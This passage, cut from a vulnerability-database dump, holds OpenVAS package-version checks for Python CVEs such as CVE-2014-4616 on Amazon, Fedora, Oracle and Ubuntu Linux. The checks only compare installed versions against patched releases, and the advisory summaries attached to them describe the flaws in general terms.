However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\");\n script_tag(name:\"solution\", value:\"Run yum update python27 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-380.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python27-tools\", rpm:\"python27-tools~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27\", rpm:\"python27~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-test\", rpm:\"python27-test~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-debuginfo\", rpm:\"python27-debuginfo~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-libs\", 
rpm:\"python27-libs~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-devel\", rpm:\"python27-devel~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7800", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867929", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 15:22:41 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7800\");\n script_tag(name:\"affected\", value:\"python on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the 'python' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7772", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7772\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867987\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 14:23:39 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7772\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:57:20", "description": "Check the version of python3", "cvss3": {}, "published": "2014-11-10T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14245", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2020-03-02T00:00:00", "id": "OPENVAS:1361412562310868464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868464", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14245\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868464\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-10 05:10:57 +0100 (Mon, 10 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14245\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~18.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the 'python3' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-8035", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867978", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-8035\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867978\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 12:28:02 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python3 FEDORA-2014-8035\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:57:02", "description": "Check the version of python3", "cvss3": {}, "published": "2014-11-14T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14257", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2020-03-02T00:00:00", "id": "OPENVAS:1361412562310868482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868482", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14257\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868482\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14257\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~10.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "description": "Oracle Linux Local Security Checks ELSA-2015-2101", "cvss3": {}, "published": "2015-11-24T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2101", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122760", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2101.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122760\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-24 10:17:32 +0200 (Tue, 24 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2101\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2101 - python security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2101\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2101.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == 
\"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-debug\", rpm:\"python-debug~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "description": "The remote host is missing an update for the 'python2.7' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2015-06-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for python2.7 USN-2653-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842261", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for python2.7 USN-2653-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 
2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842261\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-26 06:25:01 +0200 (Fri, 26 Jun 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for python2.7 USN-2653-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that multiple Python\nprotocol libraries incorrectly limited certain data when connecting to servers.\nA malicious ftp, http, imap, nntp, pop or smtp server could use this issue to\ncause a denial of 
service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking\ngzip-compressed HTTP bodies. A malicious server could use this issue to\ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain\nargument. An attacker could possibly use this issue to read arbitrary\nmemory and expose sensitive information. This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this issue\nto expose sensitive information, or possibly execute arbitrary code. This\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only affected\nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. 
(CVE-2014-7185)\");\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2653-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2653-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
